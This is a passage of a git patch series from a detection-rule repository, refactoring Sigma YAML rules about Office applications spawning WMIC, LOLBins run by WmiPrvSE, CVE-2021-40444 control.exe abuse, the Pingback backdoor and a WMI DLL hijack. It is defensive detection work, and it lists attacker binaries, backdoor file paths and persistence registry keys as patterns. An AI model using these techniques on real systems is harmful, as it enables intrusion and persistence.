a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml index 0a3bd7cc..7b25e621 100644 --- a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml +++ b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml @@ -25,8 +25,8 @@ detection: - '*mshta*' - '*verclsid*' selection2: - - Image: '*\wbem\WMIC.exe' - - ProcessCommandLine: '*wmic *' + - Image|endswith: '\wbem\WMIC.exe' + - ProcessCommandLine|contains: 'wmic ' selection3: ParentImage|endswith: - winword.exe From 49df2358def45834825efe66870e240528eaf703 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Wed, 8 Sep 2021 21:12:27 -0600 Subject: [PATCH 0798/1367] Completed changes to selection1 completed changes to selection1 to comply with rule creation guide with no ( * ) or ( \\ ) - Image|endswith: '\wbem\WMIC.exe' - ProcessCommandLine|contains: 'wmic ' --- .../Monitor_Office_Applications_Spawning_WMI_command-line.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml index 2f5a5971..f8410024 100644 --- a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml @@ -18,8 +18,8 @@ logsource: detection: #useful_information: Add more office applications to the rule logic of choice selection1: - - Image: '*\wbem\WMIC.exe' - - ProcessCommandLine: '*wmic *' + - Image|endswith: '\wbem\WMIC.exe' + - ProcessCommandLine|contains: 'wmic ' selection2: - ParentImage: - winword.exe From 5bbe3dec9bb6dfb97190e04c3139ebb8be793985 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Wed, 8 Sep 2021 21:14:58 -0600 Subject: [PATCH 0799/1367] Completed changes to selection1 and selection2 changes were completed to remove ( * ) and stay within rule creation guide: - Image|endswith: - '\winword.exe' - '\excel.exe' - '\powerpnt.exe' WMIcommand|contains: 'Win32_Process\:\:Create' --- ...Create_command_execution_by_Office_Applications.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml index 5f9e1589..d61ba1b6 100644 --- a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml +++ b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml @@ -20,12 +20,12 @@ detection: selection1: EventLog: EDR EventType: WMIExecution - WMIcommand: '*Win32_Process\:\:Create*' + WMIcommand|contains: 'Win32_Process\:\:Create' selection2: - - Image: - - '*\winword.exe' - - '*\excel.exe' - - '*\powerpnt.exe' + - Image|endswith: + - '\winword.exe' + - '\excel.exe' + - '\powerpnt.exe' condition: selection1 AND selection2 falsepositives: - Unknown From 77ee51dd768e08316d54d6f42a8eb2a7636b5457 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Wed, 8 Sep 2021 21:22:26 -0600 Subject: [PATCH 0800/1367] Changed the category Changed category to file_event --- ..._by_Office_applications_using_file_extentions.yml | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index dcfc0694..d56f39e3 100644 --- a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -14,19 +14,15 @@ status: experimental Date: 2021/08/23 logsource: product: Windows - category: process_creation + category: file_event detection: #useful_information: Please add more file extentions and magic bytes to the logic of your choice. selection1: - EventType: - - FileCreate - - FileRename - selection2: Image|endswith: - 'winword.exe' - 'excel.exe' - 'powerpnt.exe' - selection3: + selection2: FileName|endswith: - ".exe" - ".dll" @@ -38,10 +34,10 @@ detection: - ".bat" - ".scr" - ".proj" - selection4: + selection3: FileMagicBytes|startswith: - "4D5A" - condition: selection1 AND selection2 AND (selection3 OR selection4) + condition: selection1 AND (selection2 OR selection3) falsepositives: - Unknown level: high From 851dfeee46dfe0bf91aec43ba35480872e85b1af Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Wed, 8 Sep 2021 21:24:18 -0600 Subject: [PATCH 0801/1367] Changed selection2 condition changed from "\\wbem\\WmiPrvSE.exe" to "\wbem\WmiPrvSE.exe" to follow rule creation guidelines --- ...r_LOLBins_process_creations_with_Wmiprvse_parent_process.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index cf7a2801..ba8d9851 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -26,7 +26,7 @@ detection: - 'verclsid' selection2: ParentImage|endswith: - - "\\wbem\\WmiPrvSE.exe" + - "\wbem\WmiPrvSE.exe" condition: selection1 AND selection2 falsepositives: - FPs are possible here, but some LOLBins weren't excluded for obvious reasons. From fe9b91c504b66d0032b565f8a2dc2e5f8359368e Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Wed, 8 Sep 2021 21:26:01 -0600 Subject: [PATCH 0802/1367] Completed changes to selection1 changed to the following to follow rule creation guidelines: - Image|endswith: '\wbem\WMIC.exe' - ProcessCommandLine|contains: 'wmic ' --- ...pplications_from_proxy_executing_regsvr32_with_payload.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml index ecb11a21..0dbd9903 100644 --- a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml +++ b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml @@ -18,8 +18,8 @@ logsource: detection: #useful_information: add more LOLBins to the rules logic of your choice. selection1: - - Image: '*\wbem\WMIC.exe' - - ProcessCommandLine: '*wmic *' + - Image|endswith: '\wbem\WMIC.exe' + - ProcessCommandLine|contains: 'wmic ' - OriginalFileName: 'wmic.exe' - Description: 'WMI Commandline Utility' selection2: From b2c44ebd6e797dede333841813a37e912a40a51e Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Wed, 8 Sep 2021 21:27:15 -0600 Subject: [PATCH 0803/1367] Changed selection1 completed the following change to selection1 to keep inline with rule creation guideline - CommandLine|contains: 'wmic ' --- .../sysmon/Office_Applications_Spawning_WMI_command-line.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml index c38173bf..19f87e10 100644 --- a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml @@ -19,7 +19,7 @@ detection: #useful_information: Add more office applications to the rule logic of choice selection1: - Image: '\wbem\WMIC.exe' - - CommandLine: '*wmic *' + - CommandLine|contains: 'wmic ' - OriginalFileName: 'wmic.exe' - Description: 'WMI Commandline Utility' selection2: From caa5c7af1ae77459a2c639581e85723968c41b2c Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 9 Sep 2021 06:27:23 +0200 Subject: [PATCH 0804/1367] Update Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml --- ...ins_process_creations_with_Wmiprvse_parent_process.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index 5404a30d..4858fc09 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -1,4 +1,5 @@ title: Lolbins Process Creation with WmiPrvse +id: 0f33c4f0-5ac8-4462-a94a-e25d696ff5bf description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -25,9 +26,8 @@ detection: - 'mshta' - 'verclsid' selection2: - ParentImage|endswith: - - "\wbem\WmiPrvSE.exe" - condition: selection1 AND selection2 + ParentImage|endswith: \wbem\WmiPrvSE.exe + condition: selection1 and selection2 falsepositives: -- Unknown + - Unknown level: high From 312ffe69e2f36022f4901a01b4dad6e258433426 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 9 Sep 2021 06:28:48 +0200 Subject: [PATCH 0805/1367] Update Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml --- ..._process_creations_with_Wmiprvse_parent_process.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index ba8d9851..abcb3bae 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -1,4 +1,5 @@ title: LOLBins Process Created With WmiPrvSE +id: f90d4ff4-db81-4576-9719-8ed45fe387c8 description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -11,7 +12,7 @@ tags: - attack.execution - attack.defence_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: Windows category: process_creation @@ -25,9 +26,8 @@ detection: - 'mshta' - 'verclsid' selection2: - ParentImage|endswith: - - "\wbem\WmiPrvSE.exe" - condition: selection1 AND selection2 + ParentImage|endswith: \wbem\WmiPrvSE.exe + condition: selection1 and selection2 falsepositives: -- FPs are possible here, but some LOLBins weren't excluded for obvious reasons. + - FPs are possible here, but some LOLBins weren't excluded for obvious reasons. level: high From 36a5d7ec0456e68e555069a3c3c7c38a8f5c00b5 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 9 Sep 2021 08:12:36 +0200 Subject: [PATCH 0806/1367] CVE-2021-40444 false positives --- .../process_creation/win_susp_control_cve_2021_40444.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml index b21c7012..61e9daed 100644 --- a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml +++ b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml @@ -7,6 +7,7 @@ references: - https://www.joesandbox.com/analysis/476188/1/iochtml author: '@neonprimetime, Florian Roth' date: 2021/09/08 +modified: 2021/09/09 logsource: category: process_creation product: windows @@ -17,7 +18,9 @@ detection: - '\winword.exe' - '\powerpnt.exe' - '\excel.exe' - condition: selection + filter: + CommandLine|endswith: '\control.exe input.dll' + condition: selection and not filter falsepositives: - Unknown level: high From 2777187fd96f825f8a52200b221f3bfe63dab873 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 9 Sep 2021 08:46:34 +0200 Subject: [PATCH 0807/1367] docs: changed level and reference in CVE-2021-40444 rule --- .../process_creation/win_susp_control_cve_2021_40444.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml index 61e9daed..312b047b 100644 --- a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml +++ b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml @@ -3,6 +3,7 @@ id: 894397c6-da03-425c-a589-3d09e7d1f750 description: Detects a suspicious process pattern found in CVE-2021-40444 exploitation status: experimental references: + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 - https://twitter.com/neonprimetime/status/1435584010202255375 - https://www.joesandbox.com/analysis/476188/1/iochtml author: '@neonprimetime, Florian Roth' @@ -23,4 +24,5 @@ detection: condition: selection and not filter falsepositives: - Unknown -level: high +level: critical + From 015573c450ddb4d12ee127ffe1218aec90643087 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 9 Sep 2021 09:33:45 +0200 Subject: [PATCH 0808/1367] refactor: 2nd condition in CVE-2021-40444 rule --- .../process_creation/win_susp_control_cve_2021_40444.yml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml index 312b047b..41ce9647 100644 --- a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml +++ b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml @@ -13,15 +13,18 @@ logsource: category: process_creation product: windows detection: - selection: + selection1: Image|endswith: '\control.exe' ParentImage|endswith: - '\winword.exe' - '\powerpnt.exe' - '\excel.exe' + selection2: + Image|endswith: '\control.exe' + CommandLine|contains: '.cpl' filter: CommandLine|endswith: '\control.exe input.dll' - condition: selection and not filter + condition: ( selection1 or selection2 ) and not filter falsepositives: - Unknown level: critical From 6d86c7df6c35a6c980fc048fbc8a754bb323d7a2 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 9 Sep 2021 09:41:03 +0200 Subject: [PATCH 0809/1367] Revert "refactor: 2nd condition in CVE-2021-40444 rule" This reverts commit 015573c450ddb4d12ee127ffe1218aec90643087. --- .../process_creation/win_susp_control_cve_2021_40444.yml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml index 41ce9647..312b047b 100644 --- a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml +++ b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml @@ -13,18 +13,15 @@ logsource: category: process_creation product: windows detection: - selection1: + selection: Image|endswith: '\control.exe' ParentImage|endswith: - '\winword.exe' - '\powerpnt.exe' - '\excel.exe' - selection2: - Image|endswith: '\control.exe' - CommandLine|contains: '.cpl' filter: CommandLine|endswith: '\control.exe input.dll' - condition: ( selection1 or selection2 ) and not filter + condition: selection and not filter falsepositives: - Unknown level: critical From f00aaf8461f97abec19f81aa4fc0edaa76ff6cf1 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 9 Sep 2021 12:55:10 +0200 Subject: [PATCH 0810/1367] refactor: exclude case in which upper ticks are used --- .../process_creation/win_susp_control_cve_2021_40444.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml index 312b047b..2a02b7ad 100644 --- a/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml +++ b/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml @@ -20,7 +20,9 @@ detection: - '\powerpnt.exe' - '\excel.exe' filter: - CommandLine|endswith: '\control.exe input.dll' + CommandLine|endswith: + - '\control.exe input.dll' + - '\control.exe" input.dll' condition: selection and not filter falsepositives: - Unknown From d9cd1652f244b572231316ae019f79548b34aa7a Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 9 Sep 2021 16:11:41 +0200 Subject: [PATCH 0811/1367] Split global sysmon rules --- ...ry_dns_hybridconnectionmgr_servicebus.yml} | 0 ...ve_2021_31979_cve_2021_33771_exploits.yml} | 25 +++------------ .../file_event_pingback_backdoor.yml | 24 ++++++++++++++ ...ile_event_wmiprvse_wbemcomn_dll_hijack.yml | 25 +++++++++++++++ .../image_load_pingback_backdoor.yml | 24 ++++++++++++++ ...age_load_wmiprvse_wbemcomn_dll_hijack.yml} | 20 +++--------- ...ing_windows_telemetry_for_persistence.yml} | 25 ++++----------- .../process_creation_pingback_backdoor.yml} | 31 +++---------------- ...sing_windows_telemetry_for_persistence.yml | 30 ++++++++++++++++++ ...cve_2021_31979_cve_2021_33771_exploits.yml | 31 +++++++++++++++++++ 10 files changed, 154 insertions(+), 81 deletions(-) rename rules/windows/{sysmon/sysmon_dns_hybridconnectionmgr_servicebus.yml => dns_query/dns_query_dns_hybridconnectionmgr_servicebus.yml} (100%) rename rules/windows/{sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml => file_event/file_event_cve_2021_31979_cve_2021_33771_exploits.yml} (77%) create mode 100644 rules/windows/file_event/file_event_pingback_backdoor.yml create mode 100644 rules/windows/file_event/file_event_wmiprvse_wbemcomn_dll_hijack.yml create mode 100644 rules/windows/image_load/image_load_pingback_backdoor.yml rename rules/windows/{sysmon/sysmon_wmiprvse_wbemcomn_dll_hijack.yml => image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml} (77%) rename rules/windows/{sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml => process_creation/process_creation_abusing_windows_telemetry_for_persistence.yml} (70%) rename rules/windows/{sysmon/sysmon_pingback_backdoor.yml => process_creation/process_creation_pingback_backdoor.yml} (61%) create mode 100644 rules/windows/registry_event/registry_event_abusing_windows_telemetry_for_persistence.yml create mode 100644 rules/windows/registry_event/registry_event_cve_2021_31979_cve_2021_33771_exploits.yml diff --git a/rules/windows/sysmon/sysmon_dns_hybridconnectionmgr_servicebus.yml b/rules/windows/dns_query/dns_query_dns_hybridconnectionmgr_servicebus.yml similarity index 100% rename from rules/windows/sysmon/sysmon_dns_hybridconnectionmgr_servicebus.yml rename to rules/windows/dns_query/dns_query_dns_hybridconnectionmgr_servicebus.yml diff --git a/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml b/rules/windows/file_event/file_event_cve_2021_31979_cve_2021_33771_exploits.yml similarity index 77% rename from rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml rename to rules/windows/file_event/file_event_cve_2021_31979_cve_2021_33771_exploits.yml index 76de527b..c1f90858 100644 --- a/rules/windows/sysmon/sysmon_cve_2021_31979_cve_2021_33771_exploits.yml +++ b/rules/windows/file_event/file_event_cve_2021_31979_cve_2021_33771_exploits.yml @@ -1,10 +1,10 @@ -action: global title: CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum +id: ad7085ac-92e4-4b76-8ce2-276d2c0e68ef status: experimental description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum author: Sittikorn S date: 2021/07/16 -modified: 2021/08/06 +modified: 2021/09/09 references: - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ - https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/ @@ -15,11 +15,6 @@ tags: - attack.t1566 - attack.t1203 # - threat_group.Sourgum -falsepositives: - - Unlikely -level: critical ---- -id: ad7085ac-92e4-4b76-8ce2-276d2c0e68ef logsource: product: windows category: file_event @@ -37,16 +32,6 @@ detection: - 'C:\Windows\system32\ime\IMEJP\WimBootConfigurations.ini' - 'C:\Windows\system32\ime\IMETC\WimBootConfigurations.ini' condition: selection ---- -id: 32b5db62-cb5f-4266-9639-0fa48376ac00 -logsource: - product: windows - category: registry_event -detection: - selection: - TargetObject|contains: - - '\Software\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32' - - '\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32' - keywords: - - IMJPUEXP.DLL - condition: selection and keywords +falsepositives: + - Unlikely +level: critical \ No newline at end of file diff --git a/rules/windows/file_event/file_event_pingback_backdoor.yml b/rules/windows/file_event/file_event_pingback_backdoor.yml new file mode 100644 index 00000000..5b9417ab --- /dev/null +++ b/rules/windows/file_event/file_event_pingback_backdoor.yml @@ -0,0 +1,24 @@ +title: Pingback Backdoor +id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 +status: experimental +description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report +author: Bhabesh Raj +date: 2021/05/05 +modified: 2021/09/09 +references: + - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel + - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 +tags: + - attack.persistence + - attack.t1574.001 +logsource: + product: windows + category: file_event +detection: + selection: + Image|endswith: updata.exe + TargetFilename: 'C:\Windows\oci.dll' + condition: selection +falsepositives: + - Very unlikely +level: high \ No newline at end of file diff --git a/rules/windows/file_event/file_event_wmiprvse_wbemcomn_dll_hijack.yml b/rules/windows/file_event/file_event_wmiprvse_wbemcomn_dll_hijack.yml new file mode 100644 index 00000000..07e01fa6 --- /dev/null +++ b/rules/windows/file_event/file_event_wmiprvse_wbemcomn_dll_hijack.yml @@ -0,0 +1,25 @@ +title: Wmiprvse Wbemcomn DLL Hijack +id: 614a7e17-5643-4d89-b6fe-f9df1a79641c +description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. +status: experimental +date: 2020/10/12 +modified: 2021/09/09 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +tags: + - attack.execution + - attack.t1047 + - attack.lateral_movement + - attack.t1021.002 +references: + - https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html +logsource: + product: windows + category: file_event +detection: + selection: + Image: System + TargetFilename|endswith: '\wbem\wbemcomn.dll' + condition: selection +falsepositives: + - Unknown +level: critical \ No newline at end of file diff --git a/rules/windows/image_load/image_load_pingback_backdoor.yml b/rules/windows/image_load/image_load_pingback_backdoor.yml new file mode 100644 index 00000000..fd9ed05c --- /dev/null +++ b/rules/windows/image_load/image_load_pingback_backdoor.yml @@ -0,0 +1,24 @@ +title: Pingback Backdoor +id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b +status: experimental +description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report +author: Bhabesh Raj +date: 2021/05/05 +modified: 2021/09/09 +references: + - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel + - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 +tags: + - attack.persistence + - attack.t1574.001 +logsource: + product: windows + category: image_load +detection: + selection: + Image|endswith: 'msdtc.exe' + ImageLoaded: 'C:\Windows\oci.dll' + condition: selection +falsepositives: + - Very unlikely +level: high \ No newline at end of file diff --git a/rules/windows/sysmon/sysmon_wmiprvse_wbemcomn_dll_hijack.yml b/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml similarity index 77% rename from rules/windows/sysmon/sysmon_wmiprvse_wbemcomn_dll_hijack.yml rename to rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml index 8b47fd5a..1b117e85 100644 --- a/rules/windows/sysmon/sysmon_wmiprvse_wbemcomn_dll_hijack.yml +++ b/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml @@ -1,5 +1,5 @@ -action: global title: Wmiprvse Wbemcomn DLL Hijack +id: 7707a579-e0d8-4886-a853-ce47e4575aaa description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. status: experimental date: 2020/10/12 @@ -12,21 +12,6 @@ tags: - attack.t1021.002 references: - https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html -falsepositives: - - Unknown -level: critical ---- -id: 614a7e17-5643-4d89-b6fe-f9df1a79641c -logsource: - product: windows - category: file_event -detection: - selection: - Image: System - TargetFilename|endswith: '\wbem\wbemcomn.dll' - condition: selection ---- -id: 7707a579-e0d8-4886-a853-ce47e4575aaa logsource: product: windows category: image_load @@ -35,3 +20,6 @@ detection: Image|endswith: '\wmiprvse.exe' ImageLoaded|endswith: '\wbem\wbemcomn.dll' condition: selection +falsepositives: + - Unknown +level: critical diff --git a/rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml b/rules/windows/process_creation/process_creation_abusing_windows_telemetry_for_persistence.yml similarity index 70% rename from rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml rename to rules/windows/process_creation/process_creation_abusing_windows_telemetry_for_persistence.yml index 470b8f10..eeb51733 100644 --- a/rules/windows/sysmon/sysmon_abusing_windows_telemetry_for_persistence.yml +++ b/rules/windows/process_creation/process_creation_abusing_windows_telemetry_for_persistence.yml @@ -1,5 +1,5 @@ -action: global title: Abusing Windows Telemetry For Persistence +id: f548a603-c9f2-4c89-b511-b089f7e94549 status: experimental description: Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type. references: @@ -11,32 +11,19 @@ tags: - attack.t1053 author: Sreeman date: 2020/09/29 -modified: 2021/07/15 +modified: 2021/09/09 fields: - EventID - CommandLine - TargetObject - Details -falsepositives: - - none -level: high ---- -id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5 -logsource: - product: windows - category: registry_event -detection: - selection: - TargetObject|contains: - - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\ - Details|re: '.*(.sh|.exe|.dll|.bin|.bat|.cmd|.js|.ps|.vb|.jar|.hta|.msi|.vbs)$' - condition: selection ---- -id: f548a603-c9f2-4c89-b511-b089f7e94549 logsource: product: windows category: process_creation detection: selection: CommandLine|re: '(?i).*schtasks.*(-|\/)r.*\\\\Application Experience\\\\Microsoft Compatibility Appraiser.*' - condition: selection \ No newline at end of file + condition: selection +falsepositives: + - none +level: high diff --git a/rules/windows/sysmon/sysmon_pingback_backdoor.yml b/rules/windows/process_creation/process_creation_pingback_backdoor.yml similarity index 61% rename from rules/windows/sysmon/sysmon_pingback_backdoor.yml rename to rules/windows/process_creation/process_creation_pingback_backdoor.yml index a800c432..bb111e31 100644 --- a/rules/windows/sysmon/sysmon_pingback_backdoor.yml +++ b/rules/windows/process_creation/process_creation_pingback_backdoor.yml @@ -1,40 +1,16 @@ -action: global title: Pingback Backdoor +id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 status: experimental description: Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report author: Bhabesh Raj date: 2021/05/05 -falsepositives: - - Very unlikely -level: high +modified: 2021/09/09 references: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel - https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406 tags: - attack.persistence - attack.t1574.001 ---- -id: 2bd63d53-84d4-4210-80ff-bf0658f1bf78 -logsource: - product: windows - category: file_event -detection: - selection: - Image|endswith: updata.exe - TargetFilename: 'C:\Windows\oci.dll' - condition: selection ---- -id: 35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b -logsource: - product: windows - category: image_load -detection: - selection: - Image|endswith: 'msdtc.exe' - ImageLoaded: 'C:\Windows\oci.dll' - condition: selection ---- -id: b2400ffb-7680-47c0-b08a-098a7de7e7a9 logsource: product: windows category: process_creation @@ -47,3 +23,6 @@ detection: - 'start' - 'auto' condition: selection +falsepositives: + - Very unlikely +level: high \ No newline at end of file diff --git a/rules/windows/registry_event/registry_event_abusing_windows_telemetry_for_persistence.yml b/rules/windows/registry_event/registry_event_abusing_windows_telemetry_for_persistence.yml new file mode 100644 index 00000000..459fc153 --- /dev/null +++ b/rules/windows/registry_event/registry_event_abusing_windows_telemetry_for_persistence.yml @@ -0,0 +1,30 @@ +title: Abusing Windows Telemetry For Persistence +id: 4e8d5fd3-c959-441f-a941-f73d0cdcdca5 +status: experimental +description: Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type. +references: + - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ +tags: + - attack.defense_evasion + - attack.persistence + - attack.t1112 + - attack.t1053 +author: Sreeman +date: 2020/09/29 +modified: 2021/09/09 +fields: + - EventID + - 